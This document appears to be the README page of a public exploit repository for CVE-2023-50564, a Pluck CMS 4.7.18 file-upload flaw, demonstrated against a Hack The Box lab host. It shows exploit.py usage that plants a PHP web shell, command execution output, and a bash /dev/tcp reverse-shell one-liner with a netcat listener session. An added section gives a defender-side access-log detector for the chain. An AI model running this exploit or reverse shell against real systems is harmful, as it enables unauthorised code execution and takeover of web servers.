Related vulnerability
Title: Pluck security vulnerability (CVE-2023-50564)
Description: Pluck is a content management system (CMS) written in PHP. Pluck v4.7.18 contains a security vulnerability in the component /inc/modules_install.php: an arbitrary file upload flaw that allows an attacker to execute arbitrary code by uploading a crafted ZIP file.
Description
Pluck-CMS v4.7.18 RCE exploit
Introduction
# CVE-2023-50564
CVE-2023-50564 is an RCE vulnerability in Pluck CMS v4.7.18. It is made possible by an arbitrary file upload vulnerability in the `/inc/modules_install.php` component, which allows arbitrary code execution by uploading a malicious `.zip` file.
# Usage
Before running the exploit, the password to authenticate on `/login.php` needs to be known.
Running the exploit against the target:
```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
```
The malicious `.php` file can be accessed via the link provided by the script to execute commands.
Optionally, the command to execute can be specified using the `--cmd` flag:
```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd id
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
[+] Executing command 'id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
## Reverse Shell
Start the listener, then specify a command to establish a reverse shell connection on the listener using the `--cmd` flag:
```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd "bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1'"
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
[+] Executing command 'bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1''
```
The listener then receives the connection:
```console
$ rlwrap -cAr nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.78.209] 38982
bash: cannot set terminal process group (1003): Inappropriate ioctl for device
bash: no job control in this shell
www-data@greenhorn:~/html/pluck/data/modules/malicious$
```
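From a defender's side, the chain shown above leaves a recognisable trace in the web server access log: an authenticated `POST` to `/inc/modules_install.php` followed by requests from the same client to a new `/data/modules/<name>/<file>.php` path carrying a `?cmd=` query. The following detection is an added example and is not part of the exploit repository; the log lines are constructed, and the host name and IP addresses simply mirror the README's sample output.

```python
"""Defender-side detection of the CVE-2023-50564 exploitation chain in access logs.
Added example, not part of the exploit repository: flags a client that POSTs to
/inc/modules_install.php and then requests a /data/modules/<name>/<file>.php with
a ?cmd= query. Log lines are constructed; host and IPs mirror the README output.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" format: client ip, time, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
INSTALL_PATH = "/inc/modules_install.php"
MODULE_RE = re.compile(r"^/data/modules/[^/]+/[^/]+\.php$")

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect_module_webshell(lines):
    """Return {(ip, module php path): [cmd values]} for clients that hit the
    module installer and later called a module script with a query string."""
    uploaded = set()            # clients that POSTed to the installer
    findings = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["path"])
        if url.path == INSTALL_PATH and rec["method"] == "POST":
            uploaded.add(rec["ip"])
        elif MODULE_RE.match(url.path) and url.query and rec["ip"] in uploaded:
            cmd = parse_qs(url.query).get("cmd", [None])[0]
            findings[(rec["ip"], url.path)].append(cmd)
    return dict(findings)

# Constructed sample log (not real traffic): one legitimate visitor, then the chain.
SAMPLE_LOG = [
    '10.10.14.3 - - [01/Aug/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla"',
    '10.10.16.25 - - [01/Aug/2024:10:05:10 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "python-requests"',
    '10.10.16.25 - - [01/Aug/2024:10:05:11 +0000] "POST /inc/modules_install.php HTTP/1.1" 200 1834 "-" "python-requests"',
    '10.10.16.25 - - [01/Aug/2024:10:05:12 +0000] "GET /data/modules/malicious/malicious.php?cmd=id HTTP/1.1" 200 62 "-" "python-requests"',
    '10.10.14.3 - - [01/Aug/2024:10:06:00 +0000] "GET /data/modules/contactform/contactform.php HTTP/1.1" 200 200 "-" "Mozilla"',
]

if __name__ == "__main__":
    for (ip, path), cmds in detect_module_webshell(SAMPLE_LOG).items():
        print(f"[!] {ip} installed a module and invoked {path} with cmd={cmds}")
```

A legitimate module request without a prior installer POST from the same client, or without a query string, is not reported, so the rule keys on the sequence rather than on the path alone.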
# Installation
Install the requirements:
```console
$ pip install -r requirements.txt
```
Help:
```console
$ python3 exploit.py --help
usage: exploit.py [-h] --target TARGET --password PASSWORD [--cmd CMD]

Exploit Pluck v4.7.18 RCE Vulnerability

options:
  -h, --help           show this help message and exit
  --target TARGET      Target URL (Example: http://greenhorn.htb)
  --password PASSWORD  Pluck password
  --cmd CMD            Command to execute
```
# Credits
Credits to `Mirabbas Ağalarov` for discovering the vulnerability ([Link](https://www.exploit-db.com/exploits/51592)).
File snapshot
```
[4.0K] /data/pocs/7b2a7b716a53d6cce8fdf4dc279790bf81737f64
├── [2.3K] exploit.py
├── [4.8K] README.md
└── [ 34]  requirements.txt

0 directories, 3 files
```